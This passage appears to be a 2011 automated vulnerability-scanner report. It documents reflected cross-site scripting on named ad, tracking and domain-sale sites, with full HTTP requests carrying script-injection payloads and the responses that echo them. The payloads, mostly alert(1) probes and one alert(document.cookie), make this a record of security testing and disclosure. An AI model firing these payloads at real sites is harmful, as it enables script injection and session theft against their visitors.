GET /2/B3DM/2010DM/1379918009@x2397f9f"><script>alert(1)</script>40b55b3338d HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:49 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
1.118. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1379918009@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aa96"-alert(1)-"766edfae151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1379918009@x23?3aa96"-alert(1)-"766edfae151=1 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:47 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2406 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="3aa96"-alert(1)-"766edfae151=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a8e"><script>alert(1)</script>030155edc73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM98a8e"><script>alert(1)</script>030155edc73/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:18 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cb7"><script>alert(1)</script>053f18afa9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM94cb7"><script>alert(1)</script>053f18afa9e/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158b"><script>alert(1)</script>159ab450cc2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/141706813@x23c158b"><script>alert(1)</script>159ab450cc2?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:37:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/Dell_Streak11Q1_Max_Demo_160 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ded7"-alert(1)-"8d231d38687 was submitted in the USNetwork/Dell_Streak11Q1_Max_Demo_160 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_1602ded7"-alert(1)-"8d231d38687 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2442 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dell_Streak11Q1_Max_Demo_1602ded7"-alert(1)-"8d231d38687";
1.123. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/141706813@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f536"-alert(1)-"0101be03ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160&7f536"-alert(1)-"0101be03ded=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:16 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2445 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dell_Streak11Q1_Max_Demo_160&7f536"-alert(1)-"0101be03ded=1";
1.124. http://domainnamesales.com/lcontact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://domainnamesales.com
Path:
/lcontact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83be0"><script>alert(1)</script>c558e1b4c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83be0\"><script>alert(1)</script>c558e1b4c87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lcontact/?83be0"><script>alert(1)</script>c558e1b4c87=1 HTTP/1.1 Host: domainnamesales.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:53 GMT Server: Apache/2.2.16 (Amazon) X-Powered-By: PHP/5.3.2 X-Pingback: http://domainnamesales.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <form method="post" action="/lcontact/?83be0\"><script>alert(1)</script>c558e1b4c87=1″> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4e4a2<script>alert(1)</script>83865929184 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.kenexa.com/p.json?callback=_ate.ad.hpr4e4a2<script>alert(1)</script>83865929184&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.kenexa.com%2Frequest&ox15i8 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh33.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; psc=4; uid=4d5af32c71c2e1a5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 07 Mar 2011 13:56:52 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 06 Apr 2011 13:56:52 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 07 Mar 2011 13:56:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 07 Mar 2011 13:56:52 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f33cb<script>alert(1)</script>4c7ee0a1303 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.metrolyrics.com/p.json?callback=_ate.ad.hprf33cb<script>alert(1)</script>4c7ee0a1303&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.metrolyrics.com%2F&1pj0dsq HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh33.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; psc=6; uid=4d5af32c71c2e1a5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 07 Mar 2011 00:56:16 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 06 Apr 2011 00:56:16 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 07 Mar 2011 00:56:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 07 Mar 2011 00:56:16 GMT Connection: close
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 90814<script>alert(1)</script>ea8192a8c04 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=190814<script>alert(1)</script>ea8192a8c04; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:15 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:15 2011&recExp=Mon Mar 7 01:34:15 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:15 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... c=1420280&', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '190814<script>alert(1)</script>ea8192a8c04', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.co ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 70b52<script>alert(1)</script>13042405f64 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C70b52<script>alert(1)</script>13042405f64
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:21 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:21 2011&recExp=Mon Mar 7 01:34:21 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:21 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... okies={ "ar_p39750809": 'exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C70b52<script>alert(1)</script>13042405f64', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 85f4c<script>alert(1)</script>c1bc6726c37 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-129820820185f4c<script>alert(1)</script>c1bc6726c37; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Mar 2011 01:34:18 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:18 2011&recExp=Mon Mar 7 01:34:18 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:18 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31181
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS ...[SNIP]... 3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "UID": '2206bdab-24.143.206.75-129820820185f4c<script>alert(1)</script>c1bc6726c37', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 ...[SNIP]...
The value of the ar_p39750809 cookie is copied into the HTML document as plain text between tags. The payload 35d00<script>alert(1)</script>d41022b86e5 was submitted in the ar_p39750809 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&35d00<script>alert(1)</script>d41022b86e5; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; 